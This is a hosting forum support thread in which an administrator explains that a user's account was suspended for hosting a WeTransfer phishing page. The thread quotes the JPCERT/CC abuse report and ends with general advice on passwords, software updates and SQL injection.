[Solved] Suspended: lemonion

[lemonions]

Hi, I received iNode quota exceeded, and I already restructured the folder, but seems it is too late? or suspended for other reason? Need help. please and thank you.

 

 

 

Username: lemonion

Server: Tommy

Main domain: bzysharing.com

[wolstech]

It's banned for phishing. Im not sure if your site is capable of allowing people to share such material or because it got hacked, but it was definitely serving an active phishing site at the link indicated when we received the report.

 

An invitation for a replacement account will be sent to associated email address shortly so you can restore your site.

 

The abuse report the resulted in this is below:

Hello,

We have received notice of phishing content on the 65.19.143.6 IP address.

Please remove/disable the phishing content immediately and investigate
this issue.

If this is a compromised machine or account, please take care of the
underlying security vulnerabilities which were exploited.

If this is a user that opened an account for fraudulent purposes, please
permanently ban the user in question.

Once you have identified and resolved the issue, please reply to this
email with full details of resolution including specific steps taken to
prevent recurrence.

Please also CC info@jpcert.or.jp on your reply to this email.

If the phishing content is not removed promptly (within 1 hour), we may
null route the 65.19.143.6 IP address.

Complaint:

From no-reply@abuse.he.net  Mon Feb 18 00:45:06 2019
Return-Path: <no-reply@abuse.he.net>
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on he.net
X-Spam-Level: ***
X-Spam-Status: No, score=3.3 required=5.0 tests=BAYES_50,MIME_BASE64_TEXT,
        RDNS_NONE,SPF_HELO_PASS,SPF_PASS,URIBL_BLOCKED autolearn=no version=3.3.2
Authentication-Results: he.net; spf=pass (he.net: domain of abuse.he.net
 designates 216.218.217.245 as permitted sender) smtp.mailfrom=no-reply@abuse.he.net
Received-SPF: pass (he.net: domain of abuse.he.net designates
 216.218.217.245 as permitted sender) client-ip=216.218.217.245;
 envelope-from=no-reply@abuse.he.net; helo=abuse.he.net;
Received: from abuse.he.net ([216.218.217.245]) by he.net       for
 <support@he.net>; Mon, 18 Feb 2019 00:45:06 -0800
Received: from abuse.he.net (localhost [127.0.0.1])     by abuse.he.net
 (Postfix) with ESMTP id 3D7FE540420    for <support@he.net>; Mon,
 18 Feb 2019 00:43:49 -0800 (PST)
X-Mailbox-Line: From info@jpcert.or.jp  Mon Feb 18 00:43:39 2019
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from he.net (he.net [216.218.186.2]) by abuse.he.net (Postfix)
 with ESMTPS id 2A98954038E for <report@abuse.he.net>; Mon, 18 Feb 2019
 00:43:37 -0800 (PST)
Authentication-Results: he.net; spf=pass (he.net: domain of jpcert.or.jp
 designates 210.148.223.3 as permitted sender) smtp.mailfrom=info@jpcert.or.jp
Received-SPF: pass (he.net: domain of jpcert.or.jp designates
 210.148.223.3 as permitted sender) client-ip=210.148.223.3;
 envelope-from=info@jpcert.or.jp; helo=mx01.jpcert.or.jp;
Received: from mx01.jpcert.or.jp ([210.148.223.3]) by he.net with ESMTPS
 (ECDHE-RSA-AES256-GCM-SHA384:TLSv1.2:Kx=ECDH:Au=RSA:Enc=AESGCM(256):Mac=AEAD) for <abuse@he.net>; Mon, 18 Feb 2019 00:44:43 -0800
Date: Mon, 18 Feb 2019 17:43:34 +0900
Subject: JPCERT#50185904 Phishing Information
To: support@he.net
CC: soc@us-cert.gov
From: JPCERT/CC <info@jpcert.or.jp>
Reply-To: JPCERT/CC <info@jpcert.or.jp>
Message-ID: <20190218084349.7249.95432@abuse.he.net>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: multipart/signed; micalg=pgp-sha256;
 protocol="application/pgp-signature";
 boundary="6c58212c7e3fc229c6bbc51a88a798b6"
X-Virus-Status: No
X-Virus-Checker-Version: clamassassin 1.2.4 with clamdscan / ClamAV
 0.99.2/25363/Sun Feb 17 03:12:54 2019



---- Original message ----

> This is JPCERT/CC from Japan.
> 
> JPCERT/CC received a report of one or more fraudulent web site(s) that
> appear to be running on a system on your network or a constituent's
> network.
> 
> The site spoofs WeTransfer.
> 
>     fraudulent web site:
>     http[:]//bzysharing[.]com/app/WeTransfer.com/index.php
>     (65.19.143.6)
> 
>     * Please make sure to connect to the URL in an environment in
>       which the script will not execute.
>     * We confirmed the site is displayed when we access it in
>       Internet Explorer 11.
> 
> If the site differs from what you intend, please take appropriate
> measures for protection from these incidents.
> 
> We are sending this message to the technical contact person(s) of
> 
>     NetRange or inetnum:      65.19.128.0 - 65.19.191.255
> 
> found in the Whois Database.
> 
> JPCERT#50185904 is the incident reference number we assigned to this
> incident. We ask you to include this number in the subject line of
> future correspondence. We would greatly appreciate any assistance you
> can provide in dealing with this incident.
> 
> There are references on this incident in the following URLs.
> 
>     US-CERT Cyber Security Tip ST04-014
>     Avoiding Social Engineering and Phishing Attacks
>     https://www.us-cert.gov/cas/tips/ST04-014.html
> 
> JPCERT/CC is a national CSIRT and also a member of FIRST (the Forum of
> Incident Response and Security Teams, <http://www.first.org/>). Our
> primary purpose is to respond to computer security incidents for the
> Internet community in Japan.
> 
> Regards,
> JPCERT/CC Incident Response Team
> ======================================================================
> JPCERT/Coordination Center
> Phone: +81-3-6271-8901  Email: info@jpcert.or.jp
> https://www.jpcert.or.jp/

[lemonions]

Thanks for your help I received the link.

 

May I know how can I prevent this from happen again, my web not allow people to share anything / post anything. From the message your show..

 

fraudulent web site:

> http[:]//bzysharing[.]com/app/WeTransfer.com/index.php

 

Does it means that hacker has uploaded the index.php to my file system?

[wolstech]

Since you didn't upload that phishing, someone else definitely did. How it got there is anyone's guess. It could be weak passwords or a security hole in the software you were using. I'd suggest changing your passwords and keeping your software up to date (or finding different software).

[lemonions]

Okay, will take notes. Currently I am using XAMPP.

[wolstech]

XAMPP is just an AMP stack for Windows. The PHP program your site is running on would be the software that needs to be fixed/updated/replaced.

[lemonions]

I have not aware of this, the 'software' you mentioned here is the script that my web uses to access mysql might be the problem? or a different things? do you have any example of the software name?

[wolstech]

By software I mean the PHP files that makes up your site. Your PHP code is so basic that there doesn't seem to be anything to exploit for file uploads though. You do have SQL injection vulnerabilities but those are typically used to maliciously alter or steal database content, and generally wouldn't lead to someone uploading a phishing website (I would recommend some research and code updates to protect against SQL Injection).

 

A weak password is another (more likely) possibility in your particular case.

[lemonions]

Oh ok. Thanks for your advise.